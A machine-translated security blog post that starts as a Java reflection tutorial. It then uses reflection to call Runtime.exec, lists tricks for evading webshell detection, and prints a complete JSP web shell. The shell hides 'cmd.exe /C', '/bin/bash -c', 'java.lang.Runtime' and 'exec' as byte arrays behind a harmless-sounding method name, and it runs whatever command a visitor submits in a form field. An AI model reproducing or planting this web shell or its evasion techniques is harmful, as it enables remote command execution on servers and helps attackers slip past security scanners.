Author: SakuraUnique
Disclaimer: This article is only for study and research. It is strictly prohibited to engage in illegal activities. Any consequences shall be borne by the user himself.
0x00 Preface
Reflection can be said to be Java It is the most powerful technology in. It can do too many things. Many excellent open source frameworks are completed through reflection, such as many annotation frameworks in the beginning, and later because java Reflection affects performance and is therefore annotated at run time APT Instead, java Reflection has an open source framework jOOR I believe many people have used it, but we still need to learn the basic grammar of reflection so that we can write an excellent framework. Of course, the reflection technology mentioned here is learning Android Plug in technology Hook Technology is essential!
0x01 what is java reflection
JAVA Reflection mechanism is to know all the properties and methods of any class in the running state; For any object, you can call any of its methods and properties; This dynamically obtained information and the function of dynamically calling the method of the object are called java Reflection mechanism of language.
0x02 benefits of reflection
These objects can be operated during program operation;
It can reduce some coupling of the program and improve the scalability of the program.
0x03 classes of java reflection mechanism are located in the java.lang.reflect package
Class: represents a class
Field class: represents the member variables of the class (properties of the class)
Method class: represents the method of the class
Constructor class: represents the construction method of the class
Array class: provides static methods for dynamically creating arrays and accessing array elements
0x04what can java reflection do
Get class object
In reflection, to get a Class or call a Class's method, we first need to get the Class object of the Class.
In the Java API, there are three methods to obtain Class objects:
Person mPerson = new Person();
Class c1 = mPerson.getClass();//Specify specific classes
Class c2 = Person.class;//The Class of the operation is known before compilation
Class c3 =Class.forName("com.wld.java.blogs.reflect.Person"); //Know the full pathname of the class
Get class method
getMethods() //Get all public methods, including those inherited from parent classes and interfaces
getDeclaredMethods()//Gets all methods of the current class, including private methods
getMethod("methodName",Class...class) //Gets the specified method
getDeclaredMethod("methodName",Class...class) //Gets the specified method
Get class member variables
getFields() //Get all public properties, including those inherited from parent classes and interfaces
getDeclaredFields()//Gets all properties of the current class, including private
getField("fieldName")//Gets the specified property
getDeclaredField("fieldName")//Gets the specified property
Get construction method
getConstructors()//Get all public constructors of the current class. Since the subclass cannot inherit the constructor of the parent class, the constructor of the parent class cannot be obtained getDeclaredConstructors() //Gets all constructors of the current class, including private ones getConstructor(Class... class) //Gets the specified constructor getDeclaredConstructor(Class...class) //Gets the specified constructor
0x05 invoke
Object invoke(Objectobj, Object ... args) Object Corresponds to the return value of the original method. If the original method has no return value, it returns null If the original method is a static method, the formal parameter Objectobj Can be null If the original method parameter list is empty, then Object[]args by null If the original method is declared as private,You need to call this invoke()Method, the method object is explicitly called setAccessible(true)Method will be accessible private Methods.
0x06 create class object by reflection
There are two main ways to create class objects through reflection:
Through the newInstance() method of the Class object
Through the newInstance() method of the Constructor object.
The first method: through the newInstance() method of the Class object.
Class clz = Apple.class; Apple apple = (Apple)clz.newInstance();
The second method: through the newInstance() method of the Constructor object
Class clz = Apple.class; Constructor constructor =clz.getConstructor(); Apple apple =(Apple)constructor.newInstance();
You can select a specific construction method by creating a Class object through the Constructor object, while you can only use the default parameterless construction method through the Class object. The following code calls a Constructor with parameters to initialize the Class object.
Class clz = Apple.class;
Constructor constructor =clz.getConstructor(String.class, int.class);
Apple apple = (Apple)constructor.newInstance("Red Fuji", 15);
0x07 use reflection mechanism to call exec method of Runtime class to execute system command code
String op = "";
Class rt =Class.forName("java.lang.Runtime");
Method gr =rt.getMethod("getRuntime");
Method ex = rt.getMethod("exec",String.class);
Process e = (Process) ex.invoke(gr.invoke(null,new Object[]{}), "cmd /c pingwww.baidu.com");
Scanner sc = newScanner(e.getInputStream()).useDelimiter("\\A");
op = sc.hasNext() ? sc.next() : op;
sc.close();
System.out.print(op);
0x08 how to bypass detection
1. Avoid sensitive variable names as"cmd","system ","exec","shell","execute"," spy ","command"wait 2. String disassembly and reorganization take"cmd","/c"and"/bin/bash","-c"And so on, from bytes to strings 3. use Scanner Receive echo Avoid using when receiving command echo data BufferedReader And other common means 4. use fileSeparator To determine the operating system type General use System.getProperty/getProperties Get the type of operating system. Here, use the path separator to make a simple judgment, and then select"cmd /c"perhaps"/bin/bash -c"To execute the command
0x09 execution system command code that can bypass detection (attach detailed comments)
<%--jsp label
<%@ %> Page instruction to set page attributes and feature information
<% %> java Code fragment, method cannot be declared here
<%! %> java Code declaration, a method that declares a global variable or the current page
<%= %> Java expression
ProcessBuilder.start() and Runtime.exec() Methods are used to create an operating system process (perform command-line operations) and return Process An instance of a subclass that can be used to control the state of a process and obtain relevant information.
ProcessBuilder.start() and Runtime.exec()The parameters passed are different, Runtime.exec()A single string can be accepted, which separates executable command programs and parameters by spaces; You can also accept string array parameters. and ProcessBuilder The constructor of is a string list or array. The first parameter in the list is the executable command program, and the other parameters are required for command line execution.
--%>
<%@ page import="java.util.Scanner" pageEncoding="UTF-8" %>
<HTML>
<title>Just For Fun</title>
<BODY>
<H3>Build By LandGrey</H3>
<FORM METHOD=POST ACTION='#'>
<INPUT name='q' type=text>
<INPUT type=submit value='Fly'>
</FORM>
<%!
public static String getPicture(String str) throws Exception{
String fileSeparator = String.valueOf(java.io.File.separatorChar);////The file.separator represents the separator in the system directory, which is a slash
if(fileSeparator.equals("\\")){
str = new String(new byte[] {99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}) + str;
////new byte [] construct string objects in byte arrays
//new byte[] {99, 109, 100, 46, 101, 120, 101, 32, 47, 67, 32}------cmd.exe /C
}else{
str = new String(new byte[] {47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}) + str;
//byte[] {47, 98, 105, 110, 47, 98, 97, 115, 104, 32, 45, 99, 32}-----------/bin/bash -c
}
Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }));
//byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 }------java.lang.Runtime
Process e = (Process) rt.getMethod(new String(new byte[] { 101, 120, 101, 99 }), String.class).invoke(rt.getMethod(new String(new byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 })).invoke(null, new Object[]{}), new Object[] { str });
//byte[] { 101, 120, 101, 99 }---------exec
//byte[] { 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 }----------getRuntime
//Receive echo using Scanner
//Usedelimiter -- > \ \ a as input delimiter
//The separator of scanner, which is a space by default, \ \ A is a regular expression, indicating that it starts from the character header. The overall meaning of this statement is to read all inputs, including carriage return and line feed\ A matches from the beginning of the string, and Z matches from the end of the string
Scanner sc = new Scanner(e.getInputStream()).useDelimiter("\\A");
String result = "";
////The effect of hasNext() and next() is actually the same. The system will wait for the input of the next character, but the return value is different. hasNext() will return true and next() will return the input character
result = sc.hasNext() ? sc.next() : result;
sc.close();
return result;
}
%>
<%
String name ="Input Nothing";
String query = request.getParameter("q");
if(query != null) {
name = getPicture(query);
}
%>
<pre>
<%= name %>
</pre>
</BODY>
</HTML>
reference resources:
https://www.iteye.com/blog/desert3-1596020
https://xz.aliyun.com/t/2342#toc-4
Like to order and watch it again, Abba, Abba, Abba~~~~~~~~~~~
0x10 learn more about safety
Welcome to pay attention to our safety official account, learn more safety knowledge!!!
Welcome to pay attention to our safety official account, learn more safety knowledge!!!
Welcome to pay attention to our safety official account and learn more safety knowledge!
